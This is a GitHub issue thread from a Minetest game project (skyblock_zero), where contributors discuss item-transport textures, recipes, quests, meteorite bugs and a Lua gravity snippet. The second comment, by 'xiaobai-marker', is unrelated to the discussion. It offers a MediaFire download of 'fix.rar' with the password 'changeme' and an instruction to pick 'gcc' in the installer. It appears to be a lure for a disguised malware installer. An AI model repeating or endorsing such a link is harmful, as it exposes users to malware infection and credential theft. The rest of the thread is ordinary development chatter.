### ISSUE TITLE
*Item transport*

### ISSUE THREAD

**Issue by TheEt1234** [ChefZander/skyblock_zero#25]
Context from discord:

Recipes that are tricky

    puncher
    deployer
    node breaker
    
Textures that are horrible or out of place

    maybe puncher needs to get reworked, currently its just the interractor texture
    deployer
    autocrafter lacks a texture completely
    node breaker
    automatic filter injector
    item vacuum
    potentially tubes, pipeworks ones look better

 
 
 Also quests are missing the requirements ill add them later
 
 
 (edit: by later i meant when all the recipes are completed)
 
 *pls help me with the recipes and textures*

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by birdlover32767** [comment]
extra idea: make a secret quest for breaking a tube you placed


### THE TEXTURES
* robotic arm should be a robotic arm
* the autocrafter should at least have something like a 3x3 grid imo (yes this does mean it will be off-center) (also please fix the "consumbtion" typo it's consum_p_tion)
* the tube looks fine but it should be thinner because it looks like it holds fluids instead of items
* the tube variations could look a bit less saturated
* the crossing tube looks... weird but idk how to fix it
* one way tubes are fine except for the thickness
* item vacuums are fine but they could be improved upon
* the filter injector should be like the simple alloy furnace/batteries, a simple background with maybe an outline and glowing neon arrows that maybe get sequentially get brighter for a moment in an animation (yes fancy words i know the arrows light up)
* the puncher looks fine but it could use a seperate animated node when it punches
* * also when the puncher tries to mine emittrium **without** anything it just annoys you forever
* * and i think you already know about the unknown item
* the node breaker could be like the puncher but bigger and better and not able to break the core and emitters because you can do that (for some reason)
* the deployer probably should have a giant hole on one side because how else is the block going to come through
* idk about the sorter
* the item void should have at least some sort of visible matter casing
### THE RECIPES
* the robotic arm should use titanium alloy or some other weird alloy and emittrium
* autocrafter should have a retaining circuit somewhere and neutronium
* sorter should have invar on the corners
* item void should have neutronium *somewhere* (seriously though there should be a neutronium chunk or something)
* puncher should have tubes, a matter annihilator and matter blobs
* breaker should be multiple punchers with extra stuff
* deployer should be a filter injector (it somehow makes it place stuff dont ask me how it works, alloys, a retaining circuit, and tube(s)
* one way tubes should be a tube with aforementioned neutronium chunks

**Comment by TheEt1234** [comment]
but i kinda like having the tubes be big :(
ill start a poll in discord (+counting you for small tubes)

**Comment by TheEt1234** [comment]
> puncher should have tubes, a matter annihilator and matter blobs

but puncher makes the game significantly easier after you get it, there is no way it should be that cheap

**Comment by TheEt1234** [comment]
ok so i will copy your message and treat it as a checklist

problems: changing tube size would require changing pretty much any texture lol, could be done if people really really cared (so far, zander selected the "i really don't care" option)

extra idea: make a secret quest for breaking a tube you placed - :x:

 ### THE TEXTURES
 
* robotic arm should be a robotic arm
 
* the autocrafter should at least have something like a 3x3 grid imo (yes this does mean it will be off-center) - :x: - how would i make it not look horrible and at the same time not have to rewrite the entire autocrafter
 - (also please fix the "consumbtion" typo it's consum_p_tion) :heavy_check_mark: 
 
* the tube looks fine but it should be thinner because it looks like it holds fluids instead of items - :question: 
 
* the tube variations could look a bit less saturated - :question: 
 
* the crossing tube looks... weird but idk how to fix it - :question: 
 
* one way tubes are fine except for the thickness :question:
 
* item vacuums are fine but they could be improved upon :question:  - how
 
* the filter injector should be like the simple alloy furnace/batteries, a simple background with maybe an outline and glowing neon arrows that maybe get sequentially get brighter for a moment in an animation (yes fancy words i know the arrows light up) - working on this
 
* the puncher looks fine but it could use a seperate animated node when it punches
 - also when the puncher tries to mine emittrium **without** anything it just annoys you forever
 
 - and i think you already know about the unknown item
 
* the node breaker could be like the puncher but bigger and better and not able to break the core and emitters because you can do that (for some reason)
 
* the deployer probably should have a giant hole on one side because how else is the block going to come through
 
* idk about the sorter
 
* the item void should have at least some sort of visible matter casing
 
 
 ### THE RECIPES
* the robotic arm should use titanium alloy or ome other weird alloy and emittrium
 
* autocrafter should have a retaining circuit somewhere and neutronium 
* sorter should have invar on the corners 
* item void should have neutronium _somewhere_ (seriously though there should be a neutronium chunk or something) 
* puncher should have tubes, a matter annihilator and matter blobs 
* breaker should be multiple punchers with extra stuff 
* deployer should be a filter injector (it somehow makes it place stuff dont ask me how it works, alloys, a retaining circuit, and tube(s) 
* one way tubes should be a tube with aforementioned neutronium chunks

**Comment by birdlover32767** [comment]
after checking the [color names](https://en.wikipedia.org/wiki/X11_color_names):

**NOTE:** these are my opinions
* `lightgreen` or `palegreen` is best for the low priority tubes (they are literally the same color lol)
* `tomato` is best for high priority tubes
* `mediumseagreen` or `chartreuse` or `springgreen` is best for accel tubes

btw if the puncher recipe is too easy then just add neutronium or a robotic arm or whatever just make it have sense

**Comment by TheEt1234** [comment]
im spending way too much time animating the filter injector lmao.. but i guess i will learn from it

**Comment by TheEt1234** [comment]
btw discord voted to have bigger tubes, and 3 people didnt care

**Comment by TheEt1234** [comment]
ok so the new and EPIC filter injector textures are here... im really proud of them

but theres no on/off state

https://github.com/user-attachments/assets/f84f0648-9689-407e-8337-fafcef0981f8

is an on/off state nessesary

**Comment by TheEt1234** [comment]
@birdlover32767  i think people are going to confuse theese tubes a lot...
![image](https://github.com/user-attachments/assets/b1fe1668-01c9-4935-97ff-955c5fae3cd0)

**Comment by TheEt1234** [comment]
also should the tubes be 16x16 instead of 32x32?

**Comment by TheEt1234** [comment]
The robotic arm is like this now:
![image](https://github.com/user-attachments/assets/a638cbf2-e375-495b-8a36-63dd632685a6)
and is actually a pretty good tool

**Comment by TheEt1234** [comment]
oh yeah also here is the new autocrafter recipe
![image](https://github.com/user-attachments/assets/be0bf104-92b0-4803-8f32-e2e52477c256)

**Comment by TheEt1234** [comment]
![image](https://github.com/user-attachments/assets/072e879e-ab87-4c3f-8184-ba2596e17ed1)
new autocrafter texture

**Comment by TheEt1234** [comment]
or do i just stick to the 3x3 grid

**Comment by TheEt1234** [comment]
![image](https://github.com/user-attachments/assets/423886f9-4746-4c8f-b269-eba0d6729692)

**Comment by TheEt1234** [comment]
Added requirements to quests
![image](https://github.com/user-attachments/assets/0933078f-1370-4dae-a584-b6a33530d731)

**Comment by TheEt1234** [comment]
# Things that need to be finished
- recipes for deployer, node breaker, puncher
- quest requirements for deployer, node breaker and puncher
- testing


## Textures
- deployer
- node breaker
- potentially puncher?
- item vacuum

# Decisions
- 16x16 tubes or 32x32 tubes?
- everything above

**Comment by TheEt1234** [comment]
deployer textures
![image](https://github.com/user-attachments/assets/c3898a85-b85b-4163-8625-a44b252f89c9)

**Comment by birdlover32767** [comment]
nice
also your bloom god

**Comment by TheEt1234** [comment]
> nice also your bloom god

does the bloom look good

**Comment by TheEt1234** [comment]
i really like it

**Comment by birdlover32767** [comment]
sorta

**Comment by birdlover32767** [comment]
also the robotic arm should be gray with some blue thingies imo

**Comment by TheEt1234** [comment]
im back - node breaker textures 
![image](https://github.com/user-attachments/assets/f2853837-6d8d-4860-9732-efb0fd5a06b9)

**Comment by TheEt1234** [comment]
Item vacuum texture
![image](https://github.com/user-attachments/assets/8a1c465e-2749-4141-9027-8b1cf7e5f447)

**Comment by TheEt1234** [comment]
![image](https://github.com/user-attachments/assets/abea9c06-0022-4dd2-a8ef-ff3741fae2c5)
the new tube

**Comment by TheEt1234** [comment]
now just for the recipes..... ughh

**Comment by TheEt1234** [comment]
i think the puncher should be similar difficulty (maybe little less) compared to autocrafter

**Comment by TheEt1234** [comment]
and then node breaker and deployer would be significantly cheaper

**Comment by birdlover32767** [comment]
the tube looks weird now lol

also new alloy to suggest to zander (from my game thing that i can't release because i haven't bothered to license it): electrum (AuAg)

here is a photo of said game
![screenshot_20240827_204446](https://github.com/user-attachments/assets/ff719abd-0971-4d00-919d-e4d641ca6689)

**Comment by TheEt1234** [comment]
![image](https://github.com/user-attachments/assets/4cabd83c-24f1-4498-8508-3c3442f405d8)

**Comment by TheEt1234** [comment]
![image](https://github.com/user-attachments/assets/2e4c7a01-acee-4362-bb10-9eb196d9ade4)

**Comment by TheEt1234** [comment]
![image](https://github.com/user-attachments/assets/66c456a1-a51f-4c60-a097-173fa95796c3)

**Comment by TheEt1234** [comment]
are the recipes good

**Comment by TheEt1234** [comment]
> the tube looks weird now lol (well it's still fine)
> 
> also new alloy to suggest to zander (from my game thing that i can't release because i haven't bothered to license it): electrum (AuAg)
> 
> here is a photo of said game ![screenshot_20240827_204446](https://private-user-images.githubusercontent.com/162155761/361918192-ff719abd-0971-4d00-919d-e4d641ca6689.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3ODExMDQsIm5iZiI6MTcyNDc4MDgwNCwicGF0aCI6Ii8xNjIxNTU3NjEvMzYxOTE4MTkyLWZmNzE5YWJkLTA5NzEtNGQwMC05MTlkLWU0ZDY0MWNhNjY4OS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QxNzQ2NDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNWM2NmQ1NzdkZmE4MzcxM2JjZWYyYzA1ODc1NmM0YjZkMzI5ZDM1YjNjNjM5YzFlN2U1OTNhMzRhNmFlMjVhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ryeuS6ja9O1kIJjuLMXA9KFZuATLJIBB2FOtWwA8NiA)

i think it looks amazing - 
![image](https://github.com/user-attachments/assets/89e83fb6-dfe7-4f0c-8c72-7f6480b0f370)

**Comment by birdlover32767** [comment]
for the crafts: yes... probably
also uh after seeing this picture it looks amazing (the tube)

**Comment by TheEt1234** [comment]
imo we should try to keep the same pixel size for every block (unless it somehow looks good like the emitter or core)

**Comment by birdlover32767** [comment]
yes
otherwise it would look like a mod soup

**Comment by TheEt1234** [comment]
:+1:

**Comment by TheEt1234** [comment]
> # Things that need to be finished
> 
>     * recipes for deployer, node breaker, puncher ✅
> 
>     * quest requirements for deployer, node breaker and puncher ✅
> 
>     * testing
> 
> 
> ## Textures
> 
>     * deployer - ✅
> 
>     * node breaker - ✅
> 
>     * potentially puncher? - ✅  - no puncher is fine
> 
>     * item vacuum - ✅
> 
> 
> # Decisions
> 
>     * 16x16 tubes or 32x32 tubes? (basically a decision between 2x bigger tube lines or how it is now) - ✅  bigger tube
> 
>     * ~everything above~

*Everything is checked*... except testing.... oh this will be fun

**Comment by TheEt1234** [comment]
ok i discovered a serious bug immiadedly (you can't dig the core with bare hands)... fun....

**Comment by TheEt1234** [comment]
ok so you can't immiadedly start with right clicking.... super super weird

**Comment by birdlover32767** [comment]
also robotic arms should probably give some sort of new resource from the core
not sure what it would be

**Comment by TheEt1234** [comment]
> also robotic arms should probably give some sort of new resource from the core not sure what it would be

i dont think theres any need to

**Comment by theidealist101** [comment]
could always add something later if we think there's any need for it

**Comment by TheEt1234** [comment]
i just need to do testing

**Comment by TheEt1234** [comment]
and the core bug is still here and weirder than i thought

**Comment by TheEt1234** [comment]
so this may be an engine bug? because add_item doesnt seem to work the way it should

**Comment by TheEt1234** [comment]
wait no but it can't be an engine bug if it works for left click but not right click...

**Comment by theidealist101** [comment]
wait so which bug is this?

**Comment by TheEt1234** [comment]
> wait so which bug is this?

when i do left click on the core, it works as expected, giving me the items

when i hold right click, and i have my inventory empty or i am missing one or two of the core drops, SOMETIMES it gives me the other core drop, sometimes it doesn't

**Comment by TheEt1234** [comment]
so i tried putting the code that contains the add_item into minetest.after and it works??????? yeah this is definitely an engine bug....

**Comment by birdlover32767** [comment]
i can't even left click on the core

**Comment by TheEt1234** [comment]
> i can't even left click on the core

use the latest, i fixed that one i think

**Comment by birdlover32767** [comment]
wait a second why are matter blobs `drawtype = "glasslike"`

**Comment by TheEt1234** [comment]
zander got drunk or something i dont think i have modified them

**Comment by theidealist101** [comment]
oh they've always been like that lol

**Comment by TheEt1234** [comment]
i give up i will just put it in minetest.after
![image](https://github.com/user-attachments/assets/9f61f884-a3bb-4fdd-bb4a-b479de8258c5)

**Comment by birdlover32767** [comment]
i thought for a sec if it was for making light propgate but probably not

**Comment by theidealist101** [comment]
no glasslike just means it can be visually transparent, whereas normal can't

**Comment by TheEt1234** [comment]
> no glasslike just means it can be visually transparent, whereas normal can't

no? use_texture_alpha = "clip"

**Comment by birdlover32767** [comment]
also i started a world to test for any bugs and 2 asteroids just spawned
1 was just below me so i crashed it into myself and got free neutronium

and the best part?

i didn't even have the "introduction" quest

**Comment by TheEt1234** [comment]
anything related to asteroids is on theidealist

**Comment by theidealist101** [comment]
> > no glasslike just means it can be visually transparent, whereas normal can't
> 
> no? use_texture_alpha = "clip"
> 
> or blend if you are little crazy

oh yeah that's right, just checked the stuff and apparently the difference is that normal nodes are rendered even through glasslike ones

**Comment by theidealist101** [comment]
> also i started a world to test for any bugs and 2 asteroids just spawned 1 was just below me so i crashed it into myself and got free neutronium
> 
> and the best part?
> 
> i didn't even have the "introduction" quest

hmmm I have noticed they seem to be more common when you start a world, but two at once? that's odd, I'll look into that when I do the other meteorite fixes (i.e. after my current plants PR is done) since it's not high priority

**Comment by birdlover32767** [comment]
also i can't craft a storinator anymore lol

**Comment by TheEt1234** [comment]
uh

**Comment by TheEt1234** [comment]
oh did my dumb brain just think "bloat" and delete the craft ,_,

**Comment by TheEt1234** [comment]
:white_check_mark:

**Comment by birdlover32767** [comment]
update: an emittrium asteroid just came in, so it's like 4 asteroids in 6 minutes (i recorded the time)
so that's weird

**Comment by TheEt1234** [comment]
hmmm im not having them (as much)

**Comment by theidealist101** [comment]
> update: an emittrium asteroid just came in, so it's like 4 asteroids in 6 minutes (i recorded the time) so that's weird

is that all right after creating the world? because I know there's potential for asteroids to build up gradually in unloaded chunks but if that's all in the first few minutes there's not been enough time

**Comment by TheEt1234** [comment]
also btw emitters are like cores but require a matter anniliator

**Comment by TheEt1234** [comment]
i kinda like how emitters dont require spam clicking (wrist pain solution) but idk if this is too op
![image](https://github.com/user-attachments/assets/c571333d-5c4f-4085-a3de-aa5d01c65a89)

i want to say no

**Comment by TheEt1234** [comment]
but with the robotic arm it's most likely going to be insanely good

**Comment by birdlover32767** [comment]
> i kinda like how emitters dont require spam clicking (wrist pain solution) but idk if this is too op ![image](https://private-user-images.githubusercontent.com/74461678/361939864-c571333d-5c4f-4085-a3de-aa5d01c65a89.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3ODU2MDgsIm5iZiI6MTcyNDc4NTMwOCwicGF0aCI6Ii83NDQ2MTY3OC8zNjE5Mzk4NjQtYzU3MTMzM2QtNWM0Zi00MDg1LWEzZGUtYWE1ZDAxYzY1YTg5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDE5MDE0OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQwYWRlZjFhMDk3Y2QyOTRkMTZlNjNhYjA0NDA2NTE4ZmIyNmZkNDY0OTQ0NzlmMDkxYmU1OTEzNmRhMGE2ZjUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.QMX4G3xbzFhrUOVpULiXJvucgYuGY4jkwzT-hhkX9HE)
> 
> i want to say no

autohotkey

also i noticed there are 2 infinite storinator quests

**Comment by TheEt1234** [comment]
> > i kinda like how emitters dont require spam clicking (wrist pain solution) but idk if this is too op ![image](https://private-user-images.githubusercontent.com/74461678/361939864-c571333d-5c4f-4085-a3de-aa5d01c65a89.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3ODU2MDgsIm5iZiI6MTcyNDc4NTMwOCwicGF0aCI6Ii83NDQ2MTY3OC8zNjE5Mzk4NjQtYzU3MTMzM2QtNWM0Zi00MDg1LWEzZGUtYWE1ZDAxYzY1YTg5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDE5MDE0OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQwYWRlZjFhMDk3Y2QyOTRkMTZlNjNhYjA0NDA2NTE4ZmIyNmZkNDY0OTQ0NzlmMDkxYmU1OTEzNmRhMGE2ZjUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.QMX4G3xbzFhrUOVpULiXJvucgYuGY4jkwzT-hhkX9HE)
> > i want to say no
> 
> autohotkey
> 
> also i noticed there are 2 infinite storinator quests

its not autohotkey, its holding right click

also uh ill fix that

**Comment by TheEt1234** [comment]
fixed

**Comment by birdlover32767** [comment]
and charged fields have "running" infotext for some reason

**Comment by TheEt1234** [comment]
ehhhh idk if thats an issue tbh

**Comment by TheEt1234** [comment]
> > > i kinda like how emitters dont require spam clicking (wrist pain solution) but idk if this is too op ![image](https://private-user-images.githubusercontent.com/74461678/361939864-c571333d-5c4f-4085-a3de-aa5d01c65a89.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3ODU2MDgsIm5iZiI6MTcyNDc4NTMwOCwicGF0aCI6Ii83NDQ2MTY3OC8zNjE5Mzk4NjQtYzU3MTMzM2QtNWM0Zi00MDg1LWEzZGUtYWE1ZDAxYzY1YTg5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDE5MDE0OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQwYWRlZjFhMDk3Y2QyOTRkMTZlNjNhYjA0NDA2NTE4ZmIyNmZkNDY0OTQ0NzlmMDkxYmU1OTEzNmRhMGE2ZjUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.QMX4G3xbzFhrUOVpULiXJvucgYuGY4jkwzT-hhkX9HE)
> > > i want to say no
> > 
> > 
> > autohotkey
> > also i noticed there are 2 infinite storinator quests
> 
> its not autohotkey, its holding right click
> 
> also uh ill fix that

lol im getting so much emittrium i might need to start throwing it away (zander why did you think a max stack size of 16 was a good idea)

**Comment by TheEt1234** [comment]
well ill finish testing tomorrow

**Comment by birdlover32767** [comment]
also reinforced matter should look more different from matter blobs because i cant tell them apart

**Comment by TheEt1234** [comment]
> also reinforced matter should look more different from matter blobs because i cant tell them apart

yeah ok ill fix that

**Comment by TheEt1234** [comment]
so zander tried to make it semitransparent?

**Comment by TheEt1234** [comment]
well ok i made it look very different

**Comment by birdlover32767** [comment]
the phosphor quest is bugged because you craft `sbz_power:phosphor_on` instead of `sbz_power:phosphor_off`

**Comment by birdlover32767** [comment]
also tubes shouldn't require filter injectors imo

**Comment by TheEt1234** [comment]
oh also how could i forget... i should add a screwdriver recipe and change the texture, the screwdriver stuff is for tmrw though

**Comment by TheEt1234** [comment]
> the phosphor quest is bugged because you craft `sbz_power:phosphor_on` instead of `sbz_power:phosphor_off`

fixed

**Comment by TheEt1234** [comment]
> also tubes shouldn't require filter injectors imo

Ehh i mean i wanted it to be like "you first get the filter injector, then experiment with theese tubey things" but i will change it

**Comment by birdlover32767** [comment]
because the filter injector needs tubes, so you need tubes to get injectors
so makes more sense to put tubes first

but then you need to change the tubes quest to say a version of "tubes can't take items from nodes themselves. for that, make an injector"

**Comment by TheEt1234** [comment]
> because the filter injector needs tubes, so you need tubes to get injectors so makes more sense to put tubes first
> 
> but then you need to change the tubes quest to say a version of "tubes can't take items from nodes themselves. for that, make an injector"

ehh i mean the quest order is fine

**Comment by birdlover32767** [comment]
ig

**Comment by TheEt1234** [comment]
![Screenshot_20240827_221922.jpg](https://github.com/user-attachments/assets/a9560a64-39aa-484c-889f-edc900114cb5)

about to hit 100 messages...

**Comment by birdlover32767** [comment]
100th message

trying out funny gravity (basically attractors and neutronium attract, repulsor repel)

and while trying that so many meteorites spawned that it crashed the game instantly so i had to add `minetest.clear_objects({mode = "quick"})` in the globalstep

also i love that this is the discord now

**Comment by birdlover32767** [comment]
aand the game crashes instantly on meteorite crash
time to make a new world then 
wohoo

**Comment by theidealist101** [comment]
> 100th message
> 
> trying out funny gravity (basically attractors and neutronium attract, repulsor repel)
> 
> and while trying that so many meteorites spawned that it crashed the game instantly so i had to add `minetest.clear_objects({mode = "quick"})` in the globalstep
> 
> also i love that this is the discord now

bruh why'd you make neutronium attract, I deliberately made it not attract so uncleared meteorite remains wouldn't just attract more

**Comment by birdlover32767** [comment]
what i mean by attract is that it attracts players

**Comment by theidealist101** [comment]
> what i mean by attract is that it attracts players

lol

**Comment by TheEt1234** [comment]
mmmm but i dont want to rework meteorites

**Comment by TheEt1234** [comment]
> 100th message
> 
> trying out funny gravity (basically attractors and neutronium attract, repulsor repel)
> 
> and while trying that so many meteorites spawned that it crashed the game instantly so i had to add `minetest.clear_objects({mode = "quick"})` in the globalstep
> 
> also i love that this is the discord now

also zander reopened the forum for *feature* threads, but i will continue to use github

**Comment by TheEt1234** [comment]
ok the last piece of content, `only testing from now` - screwdriver
![image](https://github.com/user-attachments/assets/2605ea3d-e71e-444e-b055-87cdc5cbc772)

**Comment by TheEt1234** [comment]
rotates blocks

**Comment by TheEt1234** [comment]
oh wow i didn't expect punchers to work nicely on cores (because of the minetest.after in there)

**Comment by TheEt1234** [comment]
honestly i think this is ready to merge... @theidealist101 @birdlover32767 what do you think

**Comment by birdlover32767** [comment]
nice but what are those blue tubes

**Comment by TheEt1234** [comment]
> nice but what are those blue tubes

can you draw a circle on those blue tubes, or are you talking about the power pipes... that transport power

**Comment by TheEt1234** [comment]
Also what should i do after item transport?

Options (i will eventually get to them all, im just asking what to do first):
- Multiplayer compatibility
- Emittrium reactors
- Better switching station ticking system (that would basically allow machines to take away power or put power in less than 1 second intervals, but still not putting things in disarray)

**Comment by TheEt1234** [comment]
*Item transport has been marked as ready for review btw*

**Comment by birdlover32767** [comment]
i mean the blue tubes next to the injectors
or are they regular tubes just with fog

**Comment by TheEt1234** [comment]
> i mean the blue tubes next to the injectors or are they regular tubes just with fog

those are regular tubes

**Comment by birdlover32767** [comment]
so uh...

if you set neutronium's `gravity` group to 300 and replace the meteorite globalstep with `minetest.register_globalstep(function(dt)
	meteorite_globalstep(dt)
	for _, player in ipairs(minetest.get_connected_players()) do
		local nodes, _ = minetest.find_nodes_in_area(vector.subtract(player:get_pos(), vector.new(10,10,10)), vector.add(player:get_pos(), vector.new(10,10,10)), {"group:gravity"})
		for _, nodepos in ipairs(nodes) do
			local multiplier = minetest.get_item_group(minetest.get_node(nodepos).name, "gravity")/100
			player:add_velocity(sbz_api.get_attraction(player:get_pos(),nodepos)*(multiplier/1000))
		end
		nodes, _ = minetest.find_nodes_in_area(vector.subtract(player:get_pos(), vector.new(10,10,10)), vector.add(player:get_pos(), vector.new(10,10,10)), {"group:antigravity"})
		for _, nodepos in ipairs(nodes) do
			local multiplier = -minetest.get_item_group(minetest.get_node(nodepos).name, "antigravity")/100
			player:add_velocity(sbz_api.get_attraction(player:get_pos(),nodepos)*(multiplier/1000))
		end
	end
end) -- its in sbz_meteorites/init.lua btw`, and place neutronium inside of yourself, you will get teleported to -nan(ind), -nan(ind), -nan(ind) after getting teleported somewhere

idk how it works, maybe the velocity is set to nan or smth

**Comment by TheEt1234** [comment]
> I honestly have no clue what you guys are doing with gravity but have fun I guess??

im currently not doing anything wit hthat stuff
